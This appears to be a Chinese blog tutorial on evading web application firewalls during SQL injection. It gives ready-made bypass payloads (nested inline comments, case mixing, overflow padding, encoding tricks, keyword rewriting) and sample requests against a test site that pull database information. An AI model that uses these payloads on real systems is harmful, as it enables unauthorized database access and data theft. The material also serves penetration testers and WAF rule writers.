SQL注入常用绕WAF小技巧，从零基础到精通，收藏这篇就够了！

本文链接：https://blog.csdn.net/Javachichi/article/details/145827152

一、技术背景

黑客与WAF安全厂商总是在不断的对抗，WAF厂商不断的更新防护规则，黑客不断的进行绕过，一直处于相对面，但又一直互相成就，也在共同推进安全技术的发展。

WAF简单来说就是对我们搭建的网站进行防护，对常见的黑客攻击行为进行拦截，目前市面上常见有安全狗、ModSecurity、Naxsi等waf，也是中小型厂商比较喜欢的，不过某些原因（免费、开源等因素）涉及的一些防护规则就不是很全，所以给了黑客可乘之机。

二、常用绕WAF小技巧

1、常用注释符号

注释符号在我们平时绕waf中经常用到，也是比较经典的，我们经常在进行SQL注入的时候利用注释符号对一些恶意SQL语句进行换行注释等方式绕过WAF的检测机制，常见的注释符号有以下几种：

//, -- aa, /*!*/, /**/,#, ;（分号）%00

2、大小写随机转换

在很多时候，waf更多的检测是对某个单词进行统一检测过滤，或者对统一小写进行过滤，或统一大写字母进行过滤，没有进行无规则化的过滤就会出现漏洞；例如输入"select"为恶意语句，而"SeLeCt"、"sElECT"、"SELEct"等等不在黑名单机制中则不属于危险语句。

3、内联注释

内联注释个人理解为"万金油"，在实战中绕waf大部分都会使用到内联注释，还是多变的内联注释，使其变幻莫测，让人捉摸不透。

（1）简单的内联注释

Id=100/*!union*/select

（2）在内联注释中增加干扰符，绕过waf对内联注释的黑名单机制

Id=-2/*%!"/*/union/*%!"/*/select 1,2

（3）多重内联注释绕过单层检测防护

Id=100/*!/*!union*/*/select

（4）多个语句或单词运用内联注释

Id=100/*!/*!union*/*/select 1,2,/*!table_name*/ /*!from*/ /*!information_schema.tables where table_schema=database()*/ limit 0,1

（5）注释变量参数

Id=-1+UnIoN/*&s=*/sEleCT/*&s=*/1,2,3,database(),5,6#

4、溢出

WAF大多数都是C、C#语言编写的，在其加载和装载数据的过程中超出一定的量很容易导致溢出现象，这种一般出现在大批量的恶意请求或者响应校验时出现。

Id=-1/*SJKADASDKSAJDJWIJDLAJSKJALDJSKAJDKNSAKDWHIDASDAHSKJHADJKKADHHASHKAHKADSHKADHSKASHKSAHJSHAASKJASDKHHASKHSHSSAKHDHKSHJKHSDAKJDHSAJKHDJKADHAKJHDKAJHDJADHAJKHDJAHDJKAHDJKAHDAKJDHAJKHDAJKDHJAKHDJKADHAKJDHAJHDAKJHDJKAHSDJKAHDWHDAOWIDOQIOUQEYQIRHSAKLHOQWHDOASDASDKAHDAKJHWHIDH*/order by 1 -- AA

5、变换编码

在我们常见的传参中大多数传值时会进行一次URL编码、base64编码等多种编码后解码进行校验机制，这时我们可以利用其性质进行多次编码，绕过WAF解码后的检测。

6、同等函数或关键词替换

对于waf来说，有时候只会匹配一种函数进行过滤，但可以起到同等作用的函数则忽略了，我们换了函数之后就可以绕过waf。

schema和database``substr和substring``........

7、多种组合进行配合

配合%0a（换行）、/\*!\*/、-- AA组合等进行多种组合Bypass

8、重写

对waf过滤的函数或者单词进行重写，检测完毕后去除危险函数后还会保留某些字符进行重新组合。例如："select" 检测之后会变成空白，我们重写为"seselectlect"，检测一遍去除"select" 还剩下"select" 。

9、等号过滤替换

很多waf对等号比较敏感，我们可以使用大于号和小于号绕过、rlike\\like\\regexp替换绕过、strcmp/strncmp/between等函数替换绕过等等。

三、小案例

（1）简单测试复现存在安全狗拦截

http://www.test.com/1.php?type_id=1 and 1=1 -- aa

（2）对and进行使用&并进行编码，正常返回

http://www.test.com/1.php?type_id=1%20%26%26%201=1 -- aa

（3）直接使用select database()发现检测

http://www.test.com/1.php?type_id=1 and select database() -- aa

（4）利用%0a、/*!*/进行整合绕过，就能获取到数据库信息

四、总结

在日常SQL注入中被拦截了不要慌，多种尝试，WAF机制检测什么，拦截什么我们一一列举出来，然后按照不同的函数进行替换与变形，特别注意的是要记录好闭合方式，注入类别等信息，这可以帮助我们快速分析注入，最后收集waf检测的一些简单规则去进行绕过，不同场景的waf都有着不同的检测机制，但是我们方法和逻辑思维还是不变的，需要我们根据实际渗透环境利用以上的小技巧进行变形从而进行注入。

免责声明：

本文章仅做网络安全技术研究使用！另利用网络安全007公众号所提供的所有信息进行违法犯罪或造成任何后果及损失，均由使用者自身承担负责，与网络安全007公众号无任何关系，也不为其负任何责任，请各位自重！公众号发表的一切文章如有侵权烦请私信联系告知，我们会立即删除并对您表达最诚挚的歉意！感谢您的理解！